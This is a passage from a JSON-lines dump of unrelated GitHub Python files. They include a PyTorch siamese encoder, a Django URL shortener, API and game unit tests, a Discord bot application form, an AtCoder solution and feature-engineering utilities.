= self.conv_in(x)\n for block in self.conv_blocks:\n x = block(x)\n x = self.avg_pool(x).squeeze(2)\n x = self.fc(x)\n x = self.fc_dropout(x)\n return x\n\n def predict_step(self, batch, _):\n return self.forward(batch[\"P\"])\n\n def _init_weights(self, m, w_init=nn.init.trunc_normal_, b_init=nn.init.zeros_):\n \"\"\"\n The default init for pytorch seems to cause the beginning of training\n to be a bit suboptimal (uses Xavier?).\n \"\"\"\n if isinstance(m, nn.Conv1d):\n w_init(m.weight)\n if m.bias is not None:\n b_init(m.bias)\n\n\nencoder_factory = {\n \"conv1d\": Conv1DEncoder,\n \"ConvNext\": ConvNext1DEncoder,\n}\n\n# ------------------------------------------------------------------------------\n# Main siamese network that uses a generic encoder backbone\n# ------------------------------------------------------------------------------\nclass SiameseModule(pl.LightningModule):\n def __init__(\n self,\n *,\n encoder_type,\n encoder_params,\n optimizer,\n optimizer_params,\n scheduler,\n scheduler_params,\n loss_fn,\n ):\n super().__init__()\n\n self.encoder_type = encoder_type\n\n self.encoder = encoder_factory[encoder_type](**encoder_params)\n self.enc_dimension = self.encoder.enc_dimension\n self.optimizer = optimizer\n self.scheduler = scheduler\n self.optimizer_params = optimizer_params\n self.scheduler_params = scheduler_params\n self.loss_fn = loss_fn()\n self.save_hyperparameters()\n\n def forward(self, batch):\n x1 = batch[\"P1\"]\n x2 = batch[\"P2\"]\n d = batch[\"D\"]\n u = self.encoder(x1)\n v = self.encoder(x2)\n\n assert len(u.shape) == 2\n dpred = F.cosine_similarity(u, v, dim=1, eps=1e-6)\n return self.loss_fn(dpred, d)\n\n def training_step(self, batch, _):\n loss = self.forward(batch)\n self.log(\"train_loss\", loss, on_step=True, on_epoch=True, prog_bar=False)\n return loss\n\n def validation_step(self, batch, _):\n loss = self.forward(batch)\n self.log(\"val_loss\", loss, on_step=False, on_epoch=True, prog_bar=False)\n return loss\n\n def configure_optimizers(self):\n optimizer = self.optimizer(self.parameters(), **self.optimizer_params)\n scheduler = self.scheduler(optimizer, **self.scheduler_params)\n return {\n \"optimizer\": optimizer,\n \"lr_scheduler\": scheduler,\n \"monitor\": \"val_loss\",\n }\n","repo_name":"kristen-schneider/precision-medicine","sub_path":"pytorch/models/encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":15624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11783804338","text":"from django.shortcuts import render\n\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\n\nfrom .models import Shortener\n\nfrom .forms import ShortenerForm\n\n\ndef home_view(request):\n template = 'urlshortener/index.html'\n\n context = {}\n\n context['form'] = ShortenerForm()\n\n if request.method == 'GET':\n return render(request, template, context)\n\n elif request.method == 'POST':\n\n used_form = ShortenerForm(request.POST)\n\n if used_form.is_valid():\n shortened_object = used_form.save()\n\n new_url = request.build_absolute_uri('/') + shortened_object.short_url\n\n user_url = shortened_object.user_url\n\n context['new_url'] = new_url\n context['user_url'] = user_url\n\n return render(request, template, context)\n\n context['errors'] = used_form.errors\n\n return render(request, template, context)\n\n\ndef redirect_url_view(request, shortened_part):\n\n try:\n shortener = Shortener.objects.get(short_url=shortened_part)\n\n shortener.visits += 1\n\n shortener.save()\n\n return HttpResponseRedirect(shortener.user_url)\n\n except:\n raise Http404('Something wen\\'t wrong')","repo_name":"sikorollo/shorturl","sub_path":"urlshortener/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21347523820","text":"#:@ TIME 2021/10/28 1:17\n#:@FILE test_recharge.py\n#:@EMAIL 1557225637@QQ.COM\nfrom api.recharge import Recharge\nfrom common.handle_excel import Excel_data\nfrom common.handle_log import new_log\nfrom common.handle_database import Database\nfrom common.handle_replace_data import replace_data\nfrom common.handle_data import replace_all_data\nfrom ddt import ddt,data\nimport json\nimport path\nimport unittest\n\nnew_ddt = Excel_data(path.excel_dir + '\\\\excel_data.xlsx', 'recharge') # 创建ddt对象\n\n@ddt()\nclass Test_recharge(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls) -> None:\n new_log.info(\"====== 充值模块用例 开始执行 ========\")\n cls.new_recharge=Recharge()\n # cls.email,cls.password=cf.get_str('Account','email'),cf.get_str('Account','password')\n cls.db=Database()\n\n\n @classmethod\n def tearDownClass(cls) -> None:\n new_log.info(\"====== 充值模块用例 执行结束 ========\")\n\n\n\n @data(*new_ddt.all_data())\n def test_recharges(self,case):\n self._testMethodDoc=case['case_name']\n if case['check_sq']:\n case=replace_all_data(case)\n db_money=float(self.db.get_fetchone(case['check_sq'])['MONEY']) #查询数据库当前余额\n new_log.debug('当前数据库余额:{}'.format(db_money))\n add_money=float(json.loads(case['data'])['money']) #获取用例增加的额度\n sum_money=db_money+add_money #获取sum额度\n #更新期望额度\n case=replace_data(case,str(sum_money),'#new_money#') #替换sum额度\n #发起请求 进行充值\n response=self.new_recharge.recharge(json.loads(case['data']))\n\n new_log.debug('测试用例:{}'.format(case['case_name']))\n new_log.debug('替换后的case:{}'.format(case))\n new_log.debug('接口响应参数:{}'.format(response.json()))\n\n #将期望结果转成字段 再去对比\n\n self.assertEqual(json.loads(case['expect'])['code'],response.json()['code'])\n self.assertEqual(json.loads(case['expect'])['msg'],response.json()['msg'])\n if case['check_sq']:\n self.assertEqual(json.loads(case['expect'])['money'],str(response.json()['money']))\n\n\n\n\n","repo_name":"shiyong979796/test_api1","sub_path":"test_case/test_recharge.py","file_name":"test_recharge.py","file_ext":"py","file_size_in_byte":2238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38303992475","text":"import numpy as np\nimport sys\nfrom scipy.interpolate import RectBivariateSpline, interp1d\nimport time\n\n\ndef get_condition_array(target_data, interp_data, max_cutoff=np.inf):\n cond = np.zeros(len(interp_data), dtype=bool)\n\n start_index = None\n end_index = None\n\n for i in range(len(cond)):\n if start_index is None:\n if interp_data[i] > np.min(target_data):\n start_index = i-1\n if interp_data[i] == np.min(target_data):\n start_index = i\n if end_index is None:\n if interp_data[i] >= np.max(target_data) or \\\n interp_data[i] >= max_cutoff:\n end_index = i + 1\n \n cond[start_index : end_index] = True\n return cond\n\n\n","repo_name":"ideasrule/platon","sub_path":"platon/_interpolator_3D.py","file_name":"_interpolator_3D.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"38831108799","text":"#!/usr/bin/env python\n# To use:\n# python setup.py install\n\nfrom setuptools import setup\n\nimport version\n\n# Read the package requirements from the requirements.txt file\nwith open('requirements.txt') as f:\n install_requires = [ line.strip('\\n') for line in f.readlines() ]\n\nsetup(name = 'picmistandard',\n version = version.__version__,\n description = 'Python base classes for PICMI standard',\n platforms = 'any',\n packages = ['picmistandard'],\n package_dir = {'picmistandard': '.'},\n url = 'https://github.com/picmi-standard/picmi',\n install_requires = install_requires\n )\n","repo_name":"picmi-standard/picmi","sub_path":"PICMI_Python/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"48"} +{"seq_id":"73305402385","text":"import glob\nimport os\nimport shutil\n\nDATA_DIR = \"doodle_images/\"\nINPUT_DIR = \"input/images\"\n\nfilenames = glob.glob(os.path.join(DATA_DIR, '*.zip'))\nfilenames = sorted(filenames)\n\nfor filename in filenames:\n category = filename[:-4].split('/')[-1]\n saved_dir = os.path.join(INPUT_DIR + \"/\" + category)\n os.makedirs(saved_dir)\n shutil.unpack_archive(filename, saved_dir, \"zip\")\n\nshutil.rmtree(DATA_DIR)\n","repo_name":"lanking520/quickdraw","sub_path":"image_prepare.py","file_name":"image_prepare.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8126797755","text":"import PyQt5\nfrom PyQt5.QtWidgets import QApplication\nimport sys\nimport unittest\nimport pickle\nimport tempfile\nfrom unittest.mock import patch\n\n\nfrom ultimatetictactoe.gui.singleplayer import *\nfrom ultimatetictactoe.game.boards import Macroboard\nfrom ultimatetictactoe.game.players.ai import select_bot\n\napp = QApplication(sys.argv)\n\n\nclass TestSingleplyaerMenu(unittest.TestCase):\n\n def setUp(self):\n self.menu = SinglePlayerMenu()\n\n def tearDown(self):\n del self.menu\n\n def getButton(self, n):\n return self.menu.difficultyMenu.layout().itemAt(n - 1).widget()\n\n def testDifficultyChange(self):\n CLICKS = [1, 2, 4, 3, 4, 3, 2, 3, 4, 3, 2, 1]\n for button in CLICKS:\n self.getButton(button).click()\n self.assertEqual(self.menu.difficultySelected, button)\n\n def testCreateRadio(self):\n radio = self.menu.createRadio('text', 123)\n self.assertIsInstance(radio, PyQt5.QtWidgets.QRadioButton)\n self.assertEqual(radio.id, 123)\n self.assertEqual(radio.text(), 'text')\n\n def testCreateDifficultyMenu(self):\n box = self.menu.createDifficultyMenu()\n self.assertIsInstance(box, PyQt5.QtWidgets.QGroupBox)\n for i in range(3):\n try:\n radio = box.layout().itemAt(i).widget()\n self.assertIsInstance(radio, PyQt5.QtWidgets.QRadioButton)\n self.assertEqual(radio.id, i + 1)\n except Exception:\n self.fail('Radio error')\n fake = box.layout().itemAt(4).widget()\n self.assertFalse(fake)\n\n\nclass TestSinglePlayer(unittest.TestCase):\n def setUp(self):\n self.game = SinglePlayer()\n\n def tearDown(self):\n del self.game\n\n def testStartGame(self):\n self.assertIsNone(self.game.game)\n self.game.gameMenu.startButton.click()\n self.assertIsNotNone(self.game.game)\n self.assertIsInstance(self.game.game, SinglePlayerGame)\n self.assertEqual(self.game.game.difficulty,\n self.game.gameMenu.difficultySelected)\n self.assertEqual(self.game.game.numberOfGames,\n self.game.gameMenu.numberOfGamesSpinBox.value())\n self.assertEqual(self.game.stack.currentWidget(), self.game.game)\n\n @patch('PyQt5.QtWidgets.QFileDialog.getOpenFileName')\n def testLoadGame(self, openfile):\n board = Macroboard()\n config = (3, 4, 1, 3, 0, True, board)\n file = tempfile.NamedTemporaryFile()\n with open(file.name, 'wb') as f:\n pickle.dump(config, f)\n openfile.return_value = (file.name, '')\n self.game.loadGame()\n self.assertEqual(self.game.game.difficulty, 3)\n self.assertEqual(self.game.game.numberOfGames, 4)\n self.assertEqual(self.game.game.gamesPlayed, 1)\n self.assertEqual(self.game.game.playerScore, 3)\n self.assertEqual(self.game.game.opponentScore, 0)\n self.assertEqual(self.game.game.playerIsNotFirst, True)\n\n @patch('PyQt5.QtWidgets.QFileDialog.getOpenFileName')\n def testLoadInvalidGame(self, openfile):\n file = tempfile.NamedTemporaryFile()\n with open(file.name, 'wb') as f:\n pickle.dump('some fake stuff', f)\n openfile.return_value = (file.name, '')\n self.game.loadGame()\n self.assertEqual(self.game.game.difficulty, 1)\n self.assertEqual(self.game.game.numberOfGames, 1)\n self.assertEqual(self.game.game.gamesPlayed, 0)\n self.assertEqual(self.game.game.playerScore, 0)\n self.assertEqual(self.game.game.opponentScore, 0)\n self.assertEqual(self.game.game.playerIsNotFirst, False)\n\n\nclass TestSinglePlayerGame(unittest.TestCase):\n def setUp(self):\n self.game = SinglePlayerGame()\n\n def tearDown(self):\n del self.game\n\n @patch('PyQt5.QtWidgets.QLabel.show')\n def testDisplayMessage(self, show):\n MESSAGES = ['asd', 'asd2', 'asd3']\n for message in MESSAGES:\n self.game.displayMessage(message)\n self.assertEqual(self.game.message.text(), message)\n show.assert_any_call()\n\n def testCreateLabel(self):\n label = self.game.createLabel('test')\n self.assertIsInstance(label, PyQt5.QtWidgets.QLabel)\n self.assertEqual(label.text(), 'test')\n\n @patch('PyQt5.QtWidgets.QFileDialog.getSaveFileName')\n def testSaveGame(self, getSave):\n file = tempfile.NamedTemporaryFile()\n getSave.return_value = (file.name, '')\n self.game.saveGame()\n with file:\n config = pickle.load(file)\n self.assertTupleEqual(config[:5], self.game.getConfiguration()[:5])\n\n def testGetConfiguration(self):\n config = self.game.getConfiguration()\n self.assertIsInstance(self.game.difficulty, int)\n self.assertEqual(config[0], self.game.difficulty)\n self.assertIsInstance(self.game.numberOfGames, int)\n self.assertEqual(config[1], self.game.numberOfGames)\n self.assertIsInstance(self.game.gamesPlayed, int)\n self.assertEqual(config[2], self.game.gamesPlayed)\n self.assertIsInstance(self.game.playerScore, int)\n self.assertEqual(config[3], self.game.playerScore)\n self.assertIsInstance(self.game.opponentScore, int)\n self.assertEqual(config[4], self.game.opponentScore)\n self.assertIsInstance(self.game.playerIsNotFirst, bool)\n self.assertEqual(config[5], self.game.playerIsNotFirst)\n self.assertIsInstance(self.game.gameWidget.board, Macroboard)\n self.assertEqual(config[6], self.game.gameWidget.board)\n\n def testLoadConfiguration(self):\n board = Macroboard()\n config = (3, 4, 1, 3, 0, True, board)\n self.game.loadConfiguration(config)\n self.assertEqual(config, self.game.getConfiguration())\n\n def testUpdateScoreAndReset(self):\n games = self.game.gamesPlayed\n player = self.game.playerIsNotFirst\n score1 = self.game.playerScore\n score2 = self.game.opponentScore\n self.game.updateScoreAndReset()\n self.assertNotEqual(games, self.game.gamesPlayed)\n self.assertNotEqual(player, self.game.playerIsNotFirst)\n self.assertEqual(score1, self.game.playerScore)\n self.assertEqual(score2, self.game.opponentScore)\n\n\nclass TestBotGame(unittest.TestCase):\n def setUp(self):\n self.bot = select_bot(1)\n self.game = BotGame(self.bot)\n\n def tearDown(self):\n del self.game\n\n def getButton(self, x, y):\n microboard = self.game.qBoard.grid.itemAt(x).widget()\n return microboard.layout().itemAt(y).widget()\n\n @patch('ultimatetictactoe.game.boards.Macroboard.make_move')\n @patch('ultimatetictactoe.gui.QMacroBoard.setClickEnabled')\n def testClicks(self, enabled, make_move):\n self.getButton(0, 0).click()\n enabled.assert_called_with(False)\n make_move.assert_called_with(0, 0)\n\n def testLoadBoard(self):\n board = Macroboard()\n self.game.loadBoard(board)\n self.assertEqual(self.game.board, board)\n","repo_name":"stoimenoff/ultimate-tic-tac-toe","sub_path":"tests/singleplayer_test.py","file_name":"singleplayer_test.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"28850487822","text":"import disnake\r\nfrom disnake import TextInputStyle\r\nfrom Dbot import bot\r\nimport sqlite3\r\nfrom Dbot_Requests_Folder.request_confirm_buttons import newbieconfirm\r\n\r\nclass MyModal(disnake.ui.Modal):\r\n def __init__(self):\r\n self.owner = bot.get_user(int(581348510830690344))\r\n self.new_member_data = []\r\n self.new_member_id = 0\r\n components = [\r\n disnake.ui.TextInput(\r\n label=\"Ник в майнкрафте\",\r\n placeholder=\"Ваш ник в майнкрафте\",\r\n custom_id=\"Ник\",\r\n style=TextInputStyle.short,\r\n max_length=50,\r\n ),\r\n disnake.ui.TextInput(\r\n label=\"Ваш возраст\",\r\n placeholder=\"Ваш реальный возраст\",\r\n custom_id=\"Возраст\",\r\n style=TextInputStyle.short,\r\n ),\r\n disnake.ui.TextInput(\r\n label=\"Сколько времени играете в майнкрафт?\",\r\n placeholder=\"Сколько времени играете?\",\r\n custom_id=\"Игровое время\",\r\n style=TextInputStyle.paragraph,\r\n ),\r\n disnake.ui.TextInput(\r\n label=\"Чем на вы занимались на сервере до нас?\",\r\n placeholder=\"Или ты - новичок на сервере?\",\r\n custom_id=\"Твоё прошлое\",\r\n style=TextInputStyle.paragraph,\r\n )\r\n ]\r\n super().__init__(\r\n title=\"Заявка на сервер\",\r\n custom_id=\"emb_create\",\r\n timeout=300,\r\n components=components,\r\n )\r\n\r\n async def callback(self, inter: disnake.ModalInteraction):\r\n \r\n self.new_member_id = inter.user.id\r\n new_member = bot.get_user(int(self.new_member_id))\r\n\r\n embed = disnake.Embed(\r\n title=\"Новая заявка\",\r\n description=f\"<@{self.new_member_id}> написал заявку! Принять или отказать?\",\r\n color=0x00a2ff\r\n )\r\n \r\n\r\n with sqlite3.connect(\"no_access_to_requests.db\") as db:\r\n cursor = db.cursor()\r\n\r\n cursor.execute(\r\n \"\"\"CREATE TABLE IF NOT EXISTS requests_to_server(\r\n in_db_user_id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n discord_id BIGINT,\r\n nick TEXT,age INTEGER,\r\n play_time TEXT,\r\n past TEXT,\r\n p_status TEXT)\"\"\"\r\n )\r\n db.commit()\r\n\r\n\r\n vals = [self.new_member_id]\r\n\r\n for key, value in inter.text_values.items():\r\n vals.append(value)\r\n embed.add_field(\r\n name=key.capitalize(),\r\n value=value[:1024],\r\n inline=False,\r\n )\r\n\r\n # vals.append(\"Test_status\")\r\n\r\n with sqlite3.connect(\"no_access_to_requests.db\") as db:\r\n cursor = db.cursor()\r\n \r\n cursor.execute(\"INSERT INTO requests_to_server(discord_id, nick, age, play_time, past) VALUES (?, ?, ?, ?, ?)\", vals)\r\n db.commit()\r\n print(\"в базу данных внесена новая заявка!\")\r\n \r\n ban_user = []\r\n with sqlite3.connect(\"no_access_to_requests.db\") as db:\r\n cursor = db.cursor()\r\n cursor.execute(\"SELECT discord_id FROM requests_no_access\")\r\n vf = cursor.fetchall()\r\n for value in vf:\r\n # print(value)\r\n\r\n ban_user.append(value)\r\n # print(ban_user)\r\n\r\n ban_user = [value[0] for value in vf]\r\n \r\n \r\n if self.new_member_id in ban_user:\r\n but_user = self.new_member_id\r\n cursor.execute(\"SELECT cause FROM requests_no_access WHERE discord_id = ?\", (but_user,))\r\n fetch_reason = cursor.fetchone()\r\n reason = fetch_reason[0] if fetch_reason else \"Спросите у администрации города\"\r\n await inter.send(f\"Вам запрещено отправлять заявку в данный город.\\nПричина: {reason}\", ephemeral=True)\r\n return\r\n \r\n \r\n await self.owner.send(embed=embed, view=newbieconfirm(self.new_member_id))\r\n await inter.response.send_message(f\"<@{self.new_member_id}> заявка отправлена!\", delete_after=5)\r\n await new_member.send(f\"Твоя заявка на рассмотрении, <@{self.new_member_id}>\")","repo_name":"RigalHD/dbotpy","sub_path":"Dbot_Requests_Folder/Requests_Modal.py","file_name":"Requests_Modal.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121487826","text":"# https://atcoder.jp/contests/discovery2016-qual/submissions/17597044\n# B - ディスコ社内ツアー\nimport sys\nfrom bisect import bisect_left\n\nsys.setrecursionlimit(10 ** 7)\ninput = sys.stdin.readline\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n n = int(input())\n A = list(map(int, input().split()))\n\n MAX = max(A)\n num_index = [[] for _ in range(MAX)]\n for idx, a in enumerate(A):\n num_index[a - 1].append(idx)\n\n res = 1\n prev = -1\n for i in range(MAX):\n if not num_index[i]:\n continue\n j = bisect_left(num_index[i], prev)\n if j != 0:\n res += 1\n prev = num_index[i][j - 1]\n else:\n prev = num_index[i][-1]\n\n if prev == 0:\n res -= 1\n\n print(res)\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/Discovery_Channel_2016_Qual/Discovery_Channel_2016_Qual-B.py","file_name":"Discovery_Channel_2016_Qual-B.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72334509907","text":"# Copyright (c) Microsoft Corporation\r\n# All rights reserved.\r\n#\r\n# MIT License\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated\r\n# documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation\r\n# the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and\r\n# to permit persons to whom the Software is furnished to do so, subject to the following conditions:\r\n# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING\r\n# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\r\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,\r\n# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\r\nimport pandas as pd\r\nimport numpy as np \r\nfrom sklearn.model_selection import KFold\r\nfrom sklearn.decomposition import TruncatedSVD\r\n\r\nfrom const import FeatureType, AGGREGATE_TYPE\r\n\r\n\r\ndef left_merge(data1, data2, on):\r\n \"\"\"\r\n merge util for dataframe\r\n \"\"\"\r\n if type(on) != list:\r\n on = [on]\r\n if (set(on) & set(data2.columns)) != set(on):\r\n data2_temp = data2.reset_index()\r\n else:\r\n data2_temp = data2.copy()\r\n columns = [f for f in data2.columns if f not in on]\r\n result = data1.merge(data2_temp, on = on, how='left')\r\n result = result[columns]\r\n return result\r\n\r\n\r\ndef concat(L):\r\n \"\"\"\r\n tools for concat some dataframes into a new dataframe.\r\n \"\"\"\r\n result = None\r\n for l in L:\r\n if l is None:\r\n continue\r\n if result is None:\r\n result = l\r\n else:\r\n result[l.columns.tolist()] = l\r\n return result\r\n\r\n\r\ndef name2feature(df, feature_space, target_name='label'):\r\n assert isinstance(feature_space, list)\r\n\r\n for key in feature_space:\r\n temp = key.split('_')\r\n assert len(temp) > 1\r\n\r\n op_name = temp[0]\r\n if len(temp) == 2:\r\n i = temp[1]\r\n command = op_name + '(df, i)'\r\n elif len(temp) == 3:\r\n i, j = temp[1], temp[2]\r\n command = op_name + '(df, [i, j])'\r\n elif len(temp) == 4:\r\n stat, i, j = temp[1], temp[2], temp[3]\r\n command = op_name + '(df, i, j, [stat])'\r\n else:\r\n raise RuntimeError('Do not support this OP: ' + str(key))\r\n\r\n df = eval(command)\r\n \r\n return df\r\n\r\n\r\ndef count(df, col):\r\n \"\"\"\r\n tools for count encode\r\n \"\"\"\r\n df['count_{}'.format(col)] = df.groupby(col)[col].transform('count')\r\n return df\r\n\r\n\r\ndef crosscount(df, col_list):\r\n \"\"\"\r\n tools for multy thread bi_count\r\n \"\"\"\r\n assert isinstance(col_list, list)\r\n assert len(col_list) >= 2\r\n name = \"count_\"+ '_'.join(col_list)\r\n df[name] = df.groupby(col_list)[col_list[0]].transform('count')\r\n return df\r\n\r\n\r\ndef aggregate(df, num_col, col, stat_list = AGGREGATE_TYPE):\r\n agg_dict = {}\r\n for i in stat_list:\r\n agg_dict['AGG_{}_{}_{}'.format(i, num_col, col)] = i\r\n agg_result = df.groupby([col])[num_col].agg(agg_dict)\r\n r = left_merge(df, agg_result, on = [col])\r\n df = concat([df, r])\r\n return df\r\n\r\n\r\ndef nunique(df, id_col, col):\r\n \"\"\"\r\n get id group_by(id) nunique\r\n \"\"\"\r\n agg_dict = {}\r\n agg_dict['NUNIQUE_{}_{}'.format(id_col, col)] = 'nunique'\r\n agg_result = df.groupby([col])[id_col].agg(agg_dict)\r\n r = left_merge(df, agg_result, on = [col])\r\n df = concat([df, r])\r\n return df\r\n\r\n\r\ndef histstat(df, id_col, col, stat_list = AGGREGATE_TYPE):\r\n \"\"\"\r\n get id group_by(id) histgram statitics\r\n \"\"\"\r\n agg_dict = {}\r\n for i in stat_list:\r\n agg_dict['HISTSTAT_{}_{}_{}'.format(i, id_col, col)] = i\r\n df['temp_count'] = df.groupby(id_col)[id_col].transform('count')\r\n agg_result = df.groupby([col])['temp_count'].agg(agg_dict)\r\n r = left_merge(df, agg_result, on = [col])\r\n df = concat([df, r])\r\n del df['temp_count']\r\n return df\r\n\r\n\r\ndef base_embedding(x, model, size):\r\n \"\"\"\r\n embedding helper for bagofwords\r\n \"\"\"\r\n vec = np.zeros(size)\r\n x = [item for item in x if model.wv.__contains__(item)]\r\n for item in x:\r\n vec += model.wv[str(item)]\r\n if len(x) == 0:\r\n return vec\r\n else:\r\n return vec / len(x)\r\n\r\n\r\ndef embedding(df, col):\r\n \"\"\"\r\n This is the tool for multi-categories embedding encode.\r\n embedding for one single multi-categories column.\r\n \"\"\"\r\n from gensim.models.word2vec import Word2Vec\r\n\r\n input_ = df[col].fillna('NA').apply(lambda x: str(x).split(' '))\r\n model = Word2Vec(input_, size=12, min_count=2, iter=5, window=5, workers=4)\r\n data_vec = []\r\n for row in input_:\r\n data_vec.append(base_embedding(row, model, size=12))\r\n svdT = TruncatedSVD(n_components=6)\r\n data_vec = svdT.fit_transform(data_vec)\r\n column_names = []\r\n for i in range(6):\r\n column_names.append('embedding_{}_{}'.format(col, i))\r\n data_vec = pd.DataFrame(data_vec, columns=column_names)\r\n df = pd.concat([df, data_vec], axis=1)\r\n return df\r\n\r\n\r\ndef add_noise(series, noise_level):\r\n \"\"\"\r\n target encoding smooth\r\n \"\"\"\r\n return series * (1 + noise_level * np.random.randn(len(series)))\r\n\r\n\r\ndef add_smooth(series, p, a = 1):\r\n \"\"\"\r\n target encoding smooth\r\n \"\"\"\r\n return (series.sum() + p / series.count() + a)\r\n\r\n\r\ndef target(df, col, target_name='label'):\r\n \"\"\"\r\n target encoding using 5 k-fold with smooth\r\n\r\n target_name : surpvised learning task pred target name, y.\r\n \"\"\"\r\n df[col] = df[col].fillna('-9999999')\r\n mean_of_target = df[target_name].mean()\r\n\r\n kf = KFold(n_splits = 5, shuffle = True, random_state=2019) \r\n col_mean_name = \"target_{}\".format(col)\r\n X = df[df[target_name].isnull() == False].reset_index(drop=True)\r\n X_te = df[df[target_name].isnull()].reset_index(drop=True)\r\n X.loc[:, col_mean_name] = np.nan\r\n \r\n for tr_ind, val_ind in kf.split(X):\r\n X_tr, X_val = X.iloc[tr_ind], X.iloc[val_ind]\r\n X.loc[df.index[val_ind], col_mean_name] = X_val[col].map(X_tr.groupby(col)[target_name].apply(lambda x: add_smooth(x, 0.5, 1)))\r\n\r\n tr_agg = X[[col, target_name]].groupby([col])[target_name].apply(lambda x: add_smooth(x, 0.5, 1)).reset_index()\r\n tr_agg.columns = [col, col_mean_name]\r\n\r\n X_te = X_te.merge(tr_agg, on = [col], how = 'left')\r\n _s = np.array(pd.concat([X[col_mean_name], X_te[col_mean_name]]).fillna(mean_of_target))\r\n df[col_mean_name] = _s\r\n return df\r\n\r\n","repo_name":"SpongebBob/tabular_automl_NNI","sub_path":"fe_util.py","file_name":"fe_util.py","file_ext":"py","file_size_in_byte":6899,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"48"} +{"seq_id":"6720299125","text":"__all__ = [\"MNISTConfig\"]\nfrom typing import Tuple\n\nfrom torch.utils.data import Dataset\nfrom torchvision.datasets import MNIST\n\nfrom ..utils import chain_transforms\nfrom . import DatasetConfig\n\n\nclass MNISTConfig(DatasetConfig):\n type = \"mnist\"\n download: bool = True\n\n def build_datasets(self) -> Tuple[Dataset, Dataset]:\n train_dset = MNIST(\n self.root,\n train=True,\n transform=chain_transforms(self.transform_callables),\n download=self.download,\n )\n test_dset = MNIST(\n self.root,\n train=False,\n transform=chain_transforms(self.transform_callables),\n download=self.download,\n )\n return train_dset, test_dset\n","repo_name":"tsironisbi/config4ml","sub_path":"src/config4ml/data/dataset/builtin.py","file_name":"builtin.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"33168128811","text":"'''\nExpected Time Complexity: O(|S|)\nExpected Auixilliary Space: O(|S|)\n'''\n\nclass Solution:\n \n #Function to evaluate a postfix expression.\n def evaluatePostfix(self, S):\n #code here\n stack=[]\n \n for i in (S):\n if i.isdigit(): # returns True if string is digit . in next step we convert this string digit into integer digit\n stack.append(int(i)) # convert string (number) into integer\n \n else:\n val_2=stack.pop() # pop top 2 elements from stack to perform operations\n val_1=stack.pop()\n if i=='*':\n stack.append(val_1*val_2)\n elif i=='/':\n stack.append(val_1//val_2)\n elif i=='+':\n stack.append(val_1+val_2)\n else:\n stack.append(val_1-val_2)\n ans=stack.pop()\n return ans\n","repo_name":"anujdubey-22/Data_Structure","sub_path":"Stack and queues/Evaluation of Postfix Expression .py","file_name":"Evaluation of Postfix Expression .py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26242258502","text":"import sympy\nfrom sympy.vector import Laplacian\nfrom dolfinx import *\n\nV = sympy.Symbol(\"V\")\n\nu = sympy.Function('u')(V) # Trial\ntest_function = sympy.Function(\"test_function\")(V)\n# Berechnung der Poisson-Gleichung\nlap_u = Laplacian(u) # Laplace-Operator auf u\n\n\nomega = sympy.Symbol(\"omega\")\nterm = sympy.Integral(3 + sympy.Pow(lap_u, 3) + 5, omega)\n\nlap = term.atoms(sympy.Pow)\n\nsympy.pprint(lap)\nprint(len(lap))\n#sympy.pprint(term)\n\n","repo_name":"Denn1sMay/ma","sub_path":"Test/trash2.py","file_name":"trash2.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15220599591","text":"\"Applies a 2D Window (blackman, hamming, or hanning) to the k-space data\"\nimport numpy as N\nfrom recon.operations import Operation, Parameter, ChannelIndependentOperation\n\nwindow_types = {\n \"blackman\": N.blackman,\n \"hamming\": N.hamming,\n \"hanning\": N.hanning}\n\ndef getWindow(winName, xSize, ySize):\n \"\"\"\n generates a 2D window in following 